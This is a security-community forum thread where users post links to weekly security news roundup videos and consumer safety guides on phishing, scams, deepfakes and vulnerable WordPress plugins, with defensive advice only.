(https://d1ka0itfguscri.cloudfront.net/Lh/2023/10/19/08/11/c06qjXVEIlg/preview.jpg)
-
Weekly Security News Roundup WE 10-20-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/10/20/15/24/c06YoZVEF29/preview.jpg)
https://youtu.be/1ge2y6wwbPM
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
How to avoid package-delivery scams
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/10/23/20/39/c060YgVETvM/preview.jpg)
https://youtu.be/9G0jGpDGH2Q
The number of people who shop online rose to 2.64 billion worldwide.
That's equal to 33.3% of the globe's population.
My thanks to Dan Rafter for his informative article and the inspiration for this video.
You'll find his article at https://tinyurl.com/yqojuohf
-
Phishing - What is it and how can you avoid it
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/10/26/23/10/c06O06VEAtP/preview.jpg)
https://youtu.be/cqm6NxVZBiA
Phishing attacks can come in the form of emails, text messages, or phone calls.
The more you know about phishing attacks, the better equipped you will be to
spot and avoid them.
-
Weekly Security News Roundup WE 10-27-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/10/28/01/59/c06uVRVEpIQ/preview.jpg)
https://youtu.be/QErOjURqQlM
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Protecting Yourself from AI Generated Cybercrime
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/11/01/22/27/c0XV3tVELJ6/preview.jpg)
https://youtu.be/dRcvvKBBppc
Cybercriminals are increasingly using AI to enhance the effectiveness of their attacks.
-
12 holiday scams to watch out for in 2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/11/02/23/12/c0Xn0lVE9U4/preview.jpg)
https://youtu.be/BaltYeB1RKY
'Tis the season to use common sense and reason.
You'll find additional tips and information on this topic at:
https://tinyurl.com/ykbu52vu
-
Weekly Security News Roundup WE 11-3-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/11/03/21/24/c0XerZVEWHd/preview.jpg)
https://youtu.be/yCeo8bbXF68
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Holiday Scams - Your Essential Guide
https://bob3160.blogspot.com/2023/11/holiday-scams-your-essential-guide.html
-
Weekly Security News Roundup WE 11-10-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/11/10/19/00/c0X6qcVGYgM/preview.jpg)
https://youtu.be/3tnlB13PaEY
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
600,000 WordPress sites still vulnerable:
https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/
polonus
-
Weekly Security News Roundup WE 11-17-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/11/17/22/43/c0Xb35VGpgs/preview.jpg)
https://youtu.be/aNren1bJ4LI
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
10 Safety tips for safe online-shopping
on Black Friday and Cyber Monday
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/11/20/23/05/c0XY0hVGJQ4/preview.jpg)
https://youtu.be/4GPYjdgOriU
The holiday season is upon us, and with it comes the excitement
of Black Friday and Cyber Monday.
Follow these tips to enjoy your shopping while staying safe.
My thanks to Emma McGowan for her article on this topic.
Read her article at: https://tinyurl.com/ymj39b4t
-
Weekly Security News Roundup WE 11-24-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/11/24/23/34/c0XZ04VGWUL/preview.jpg)
https://youtu.be/5wpdsbzLtNU
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Associated Press, ESPN, CBS among top sites serving fake virus alerts
https://www.malwarebytes.com/blog/threat-intelligence/2023/11/associated-press-espn-cbs-among-top-sites-serving-fake-virus-alerts
-
Weekly Security News Roundup WE 12-1-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/12/01/22/09/c0lV3QVmYHu/preview.jpg)
https://youtu.be/0LRPN0tZenM
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
@Pondus,
Both of your entries, along with others, are part of my roundup. Not because I found them here,
but because we are probably following the same sources, and I only do the roundup weekly. Thanks.
-
Re: https://flashpoint.io/blog/danabot-version-3-what-you-need-to-know/
polonus
-
Weekly Security News Roundup WE 12-8-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/12/09/16/19/c0lQDqVmE0L/preview.jpg)
https://youtu.be/7RNacrJm9Ds
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Android phones can be taken over remotely – update when you can
https://www.malwarebytes.com/blog/news/2023/12/android-phones-can-be-taken-over-remotely-update-when-you-can
-
Weekly Security News Roundup WE 12-15-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/12/15/14/15/c0lo2oVHVaV/preview.jpg)
https://youtu.be/XLlmLfE2ZPo
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
The Avast Phishing Awards
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/12/20/20/51/c0lYY7VH2g4/preview.jpg)
https://youtu.be/TqkgBwPApFM
Welcome to the most prestigious event in the world of cyber trickery.
The first annual Avast Phishing Awards!
My thanks to Emma McGowan for sharing this information.
You can find her article on the Avast Blog at: http://tinyurl.com/yss2s6w5
-
Weekly Security News Roundup WE 12-22-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/12/22/14/22/c0l323VHq57/preview.jpg)
https://youtu.be/3a0ISilRDuQ
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Very topical again: protect against skimming of your online payments by cybercriminals. Read:
https://www.techrepublic.com/article/magecart-attack-what-it-is-how-it-works-and-how-to-prevent-it/
Use a good JavaScript blocker and the SafeToOpen Online Security extension when paying for your goods at a webshop cart service.
polonus
-
Twas the day after Christmas
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/12/26/16/25/c0lODTVH0Sc/preview.jpg)
https://youtu.be/8aQLxmX-0_s
A post-holiday poem for the digital age we should all follow.
Thanks to the Avast Blog for this information.
https://blog.avast.com/day-after-christmas-digital-age-poem
-
Weekly Security News Roundup WE 12-29-2023
(https://d1ka0itfguscri.cloudfront.net/Lh/2023/12/29/13/19/c0lUIqVHvFb/preview.jpg)
https://youtu.be/Qg7DA5lnsHw
This week's important Security News gathered from many sources across the internet.
Since this is the final installment of 2023, I've also included a recap of the
most dangerous Cyber threats we encountered during 2023.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup WE 1-5-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/01/05/20/26/cZVhYOVHG8w/preview.jpg)
https://youtu.be/K746sFRkZb4
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup WE 1-12-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/01/13/00/04/cZVIcfVJhl2/preview.jpg)
https://youtu.be/FXYZXzNFMck
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Weekly Security News Roundup WE 1-19-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/01/20/17/39/cZVYbgVJtVJ/preview.jpg)
https://youtu.be/T0Npq19Z-W4
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
How to avoid Facebook Scams
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/01/22/22/30/cZV33vVJxJJ/preview.jpg)
https://youtu.be/B8fQYuEOtsg
Last week I reported on the “I’ll miss him so much” Facebook scam in my
Weekly Security News Roundup - https://bit.ly/SecurityNewsRoundup
I thought it was time to post some advice on avoiding scams on Facebook.
I hope this helps.
I used Copilot and Pictory.ai to create the video. https://pictory.ai?ref=t015o
-
Simple advice to follow to prevent
becoming a victim of Identity Theft
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/01/26/00/04/cZVOcfVJE90/preview.jpg)
https://youtu.be/HXV6PgsCfD8
Identity Theft Awareness Week 2024 starts on January 29.
The following information is offered to help you avoid becoming a victim.
See the video show notes for additional references.
My thanks to Emma McGowan for her informative article which prompted this video.
You'll find her article on the Avast Blog at: https://bit.ly/3Ugd2fI
I used Pictory.ai in creating this video: https://pictory.ai?ref=t015o
-
Weekly Security News Roundup WE 1-26-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/01/26/20/00/cZVOYcVJHyO/preview.jpg)
https://youtu.be/Z86p-3YAW2A
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
Check if you're affected by the Mega Breach: https://cybernews.com/personal-data-leak-check/
-
Today's Digital Battlefield -
How AI is Protecting Us from Cybercrime
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/01/31/21/14/cZVwr2VdczY/preview.jpg)
https://youtu.be/eY73wMPgr_c
The battle against cybercrime is a continuous one, but AI offers a beacon of hope.
By understanding the diverse threats and leveraging the power of AI, we can build
a more secure digital future, one byte at a time. Remember, while AI is a powerful tool,
it's crucial to practice safe online habits like using a reputable Antivirus,
strong passwords and being cautious about suspicious links and emails.
I used AI (Bard) and Pictory.ai to create the video. https://pictory.ai?ref=t015o
I used Microsoft Designer to create some of the images used in this video.
-
AI and Deepfake Porn - Nothing New
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/01/16/04/cZnVDfVdeAx/preview.jpg)
https://youtu.be/jGN5wpW_pqs
After AI-generated pornographic images of Taylor Swift went viral on X,
we're left asking: What does this mean for the future of AI?
My thanks to Emma McGowan for her article and Avast's Threat Intelligence Director,
Michal Salát for his expertise in providing this insight on an important although disturbing topic.
Read Emma's article on the Avast Blog at: https://bit.ly/3ufZFBp
I used Pictory.ai to create the video. https://pictory.ai?ref=t015o
-
Weekly Security News Roundup WE 2-2-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/03/00/11/cZnecXVdjAx/preview.jpg)
https://youtu.be/xY1oEZaCrQQ
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Phishing Frenzy - Don't Be the Catch
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/05/15/00/cZnhocVdIGP/preview.jpg)
https://youtu.be/SPDCG_zSIoQ
By using the tools and knowledge provided in this guide,
you can navigate the digital world with confidence,
leaving the phishers floundering in your wake.
I used Copilot and Pictory.ai to help with the creation of this video.
https://pictory.ai?ref=t015o
-
Safer Internet Day: Navigating the Digital World with Care
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/06/14/34/cZn124VdbMo/preview.jpg)
In the vast expanse of the digital universe, Safer Internet Day stands as a beacon of awareness, guiding netizens towards a more secure and positive online experience. Celebrated globally in February, this day is a call to action for everyone to contribute to a safer internet, particularly for the younger generation.
What is Safer Internet Day?
Initiated in Europe in 2003 and now observed in over 100 countries, Safer Internet Day is a community-led effort to promote responsible, respectful, and creative use of technology. It's a day dedicated to empowering users, especially children and young people, to navigate the internet safely.
Why is it Important?
The internet is a double-edged sword; while it offers immense knowledge and connectivity, it also poses risks like cyberbullying, fraud, and exposure to inappropriate content. Safer Internet Day emphasizes education and dialogue about online safety to protect users from these dangers.
Steps Towards a Safer Internet - Here are a few pointers to foster a safer digital environment:
Educate and Engage: Talk to children about the potential risks online and encourage them to share their internet experiences.
Use Privacy Settings: Adjust privacy settings on social media and other platforms to control who sees your information.
Strong Passwords: Create complex passwords and change them regularly to secure your accounts.
Think Before You Click: Be wary of suspicious links and offers that seem too good to be true to avoid scams and malware.
Report and Support: If you encounter harmful content or behavior, report it to the platform and support those affected.
Remember, a safer internet is not just a one-day affair but a continuous journey. Let's join hands and pledge to make every day a Safer Internet Day!
For more information and resources, visit the official Safer Internet Day websites:
https://www.saferinternetday.org/
-
Deepfakes Gone Deep -
When Can You Believe What You See Online?
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/06/17/22/cZn1b3VdFvj/preview.jpg)
https://youtu.be/D6JsomMlWIU
The Future of Deepfakes - Deepfakes are here to stay, and their potential impact is immense.
I used Google's Bard and Pictory.ai to create the video. https://pictory.ai?ref=t015o
-
Keep up the good work, Bob. Appreciate you.
-
Keep up the good work, Bob. Appreciate you.
Thanks, I appreciate that. :)
-
Phishing Email - Don't get Hooked
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/08/14/31/cZnj2wVdTCz/preview.jpg)
https://youtu.be/FZnoOS4ZXXc
Dissecting a phishing email. What you should look for,
what to avoid and what to do after you've received it.
Phishing is the most prevalent form of malware in 2024.
You are the bait, but you don't have to fall for it.
-
Weekly Security News Roundup WE 2-9-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/10/01/07/cZn6ViVdvSo/preview.jpg)
https://youtu.be/xW5Uj0Yk4rk
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
The Dark Web Explained: What It Is and How to Stay Safe
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/11/17/14/cZnXb2VdxSw/preview.jpg)
https://youtu.be/AKN3Rhdyui4
The Dark Web is a complex and multifaceted part of the internet.
While it can be a tool for privacy and free speech, it also harbors
dangers that require careful navigation.
I used Copilot and Pictory.ai as aids in creating this video.
https://pictory.ai?ref=t015o
-
Cybersecurity Hygiene - Essential Practices to Stay Safe Online
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/12/22/34/cZnl34VdA3T/preview.jpg)
https://youtu.be/E5bIzyfQEB8
Cybersecurity hygiene doesn't need to be complicated or overwhelming.
By building the habits outlined in this video into your digital life,
you significantly reduce your risk of falling victim to cyberattacks.
I used Gemini and Pictory.ai to help with the creation of this video.
https://pictory.ai?ref=t015o
-
Don't Let a Hacker Steal Your Heart This Valentine's Day
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/13/14/29/cZnI2UVdgCH/preview.jpg)
https://youtu.be/C4gOsce5EtQ
Love Wisely Online - This Valentine's Day, while you're searching for love
or celebrating it, remember to stay cyber safe. I used Copilot, Gemini and Pictory.ai
to help with the creation of this video. https://pictory.ai?ref=t015o
-
Tax season is here - so are the Cybercrooks
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/14/16/28/cZn2DuVd57h/preview.jpg)
https://youtu.be/JmTWyx-UpMU
Here's some advice so you can go ahead and file those taxes with confidence,
and let the cybercrooks know that when it comes to your personal information,
the joke’s on them!
I used Copilot and Pictory.ai to help with the creation of this video.
https://pictory.ai?ref=t015o
-
Here's another Phishing email not caught by Gmail.
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/16/00/56/cZnDc8VdJ80/preview.jpg)
-
Weekly Security News Roundup WE 2-16-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/17/14/34/cZnb24Vds9u/preview.jpg)
https://youtu.be/lVvunnHZ1i4
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU)
https://www.justice.gov/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian
-
Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU)
https://www.justice.gov/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian
It was one of the items covered in my Security News Roundup. :)
-
More Spam not caught by Gmail
-
Weekly Security News Roundup WE 2-23-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/23/16/36/cZn0DzVKXg1/preview.jpg)
https://youtu.be/XHhG5cg23DI
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Is the US-World Healthcare Infrastructure Under Attack?
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/24/15/00/cZnZocVKIOp/preview.jpg)
https://youtu.be/_KbCfQSiSiI
The rise in cyberattacks on healthcare infrastructure is a concerning trend
that underscores the need for robust cybersecurity measures and public awareness.
I used Copilot, Gemini, and Pictory.ai to help in the creation of this video.
https://pictory.ai?ref=t015o
-
Ransomware Resurgence -
Preparing for the Inevitable Attack
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/26/14/48/cZnO2JVKb8k/preview.jpg)
https://youtu.be/IIdYk0O5eqw
Ransomware is a constantly evolving threat. Stay vigilant and follow the
advice offered in this video. I used Copilot and Pictory.ai to help in the
creation of this video. https://pictory.ai?ref=t015o
-
How to Protect Against W-2 Phishing Scams
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/27/23/04/cZnt0fVK0Eq/preview.jpg)
https://youtu.be/akSL95Au05s
Stay safe, stay secure and realize that early detection of suspicious activity can prevent
further damage and lead to quicker resolution.
My thanks to Emma McGowan for her article on the Avast Blog and the idea for this video.
You'll find her article at: https://blog.avast.com/w-2-phishing-scams
I used Copilot and Pictory.ai to help in the creation of this video.
Please use the following link if you're interested in Pictory.ai: https://pictory.ai?ref=t015o
-
The Deepfake Dilemma - A Closer Look
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/02/28/21/09/cZnurQVKt4F/preview.jpg)
https://youtu.be/5aQSmWcOZw4
Remember, in a world where videos can lie, your critical thinking is your superpower.
Use it wisely, and don't forget to laugh along the way.
I used Copilot and Pictory.ai to help in the creation of this video.
If you're interested in trying Pictory.ai please use the following link.
https://pictory.ai?ref=t015o
-
Algorithms - The Good the Bad the Ugly
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/01/00/37/cZeVcAVKx22/preview.jpg)
https://youtu.be/lrIjEz4Zc7o
This video underscores the importance of ethical considerations in algorithm design,
to ensure that as we advance technologically, we do so responsibly.
I used Copilot and Pictory.ai to help in the creation of this video.
If you're interested in trying Pictory.ai please use the following link.
https://pictory.ai?ref=t015o
-
Weekly Security News Roundup WE 3-1-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/02/02/24/cZennZVKaSD/preview.jpg)
https://youtu.be/Z5GSqmn6DLg
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
-
Securing the Cloud
Navigating the Sky of Data Protection
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/03/17/31/cZeebwVKARA/preview.jpg)
https://youtu.be/q3w9CzxWoE8
By understanding the complexities of cloud security, preparing for data breaches,
and adhering to compliance standards, they can ensure that their journey through the cloud
is both secure and compliant, protecting their most valuable asset: data.
I used Copilot and Pictory.ai to help in the creation of this video.
If you're interested in trying Pictory.ai please use the following link.
https://pictory.ai?ref=t015o
-
The Perils of Ancient Androids
A Lighthearted Look at Android Outdated Tech
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/05/21/16/cZehrDVKmTe/preview.jpg)
https://youtu.be/j2BTdG0MRL0
Stay safe, stay secure and please update that ancient Android device
to keep yourself safe and the bad guys at bay.
I used Copilot and Pictory.ai to help in the creation of this video.
If you're interested in trying Pictory.ai please use the following link.
https://pictory.ai?ref=t015o
-
Infested WordPress sites let browsers attack visitors:
https://blog.sucuri.net/2024/03/from-web3-drainer-to-distributed-wordpress-brute-force-attack.html
polonus
-
TikTok - The Newsroom of Today
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/08/13/38/cZejIBVKPXX/preview.jpg)
https://youtu.be/OWvhuxNADDU
Stay safe, stay secure and remember, in the fast-paced world of social media,
a little fact-checking goes a long way and TikTok isn't where you should get your news.
I used Copilot and Pictory.ai to help in the creation of this video.
If you're interested in trying Pictory.ai please use the following link.
https://pictory.ai?ref=t015o
-
Weekly Security News Roundup WE 3-3-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/08/20/43/cZejY5VK90N/preview.jpg)
https://youtu.be/If3QG8OTvC4
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.
If you find my videos helpful, please buy me a cup of coffee -
https://ko-fi.com/bob3160
-
Understanding TikTok’s Data Dilemma
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/09/19/53/cZeQqMVKRNZ/preview.jpg)
https://youtu.be/MhPfN8D9jyA
Banning TikTok might provide a temporary sense of action,
but it’s unlikely to cure the ills of social media apps.
Figuring out what to do about TikTok isn’t just about one app.
It’s about how we handle privacy and data security in the digital age.
I used Copilot and Pictory.ai to help in the creation of this video.
If you're interested in trying Pictory.ai please use the following link.
https://pictory.ai?ref=t015o
-
Again thousands of WordPress websites with a vulnerable Popup Builder:
https://wordpress.org/plugins/popup-builder/advanced/
Scan your WP website here: https://hackertarget.com/wordpress-security-scan/
WP websites demand maintenance. User enumeration and directory listing should be set to disabled.
One cannot assume one is protected just by sitting in the cloud.
polonus
-
Again thousands of WordPress websites with a vulnerable Popup Builder:
https://wordpress.org/plugins/popup-builder/advanced/
Scan your WP website here: https://hackertarget.com/wordpress-security-scan/
WP websites demand maintenance. User enumeration and directory listing should be set to disabled.
One cannot assume one is protected just by sitting in the cloud.
polonus
I don't use any add-ons or plugins on my site. :)
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/12/13/36/cZelIzV7hmW/preview.jpg)
-
Weekly Security News Roundup WE 3-15-2024
(https://d1ka0itfguscri.cloudfront.net/Lh/2024/03/15/18/12/cZeoFlV7FaU/preview.jpg)
https://youtu.be/qg2ezN_RR-A
This week's important Security News gathered from many sources across the internet.
Links to the articles referenced in this video are part of the video show notes.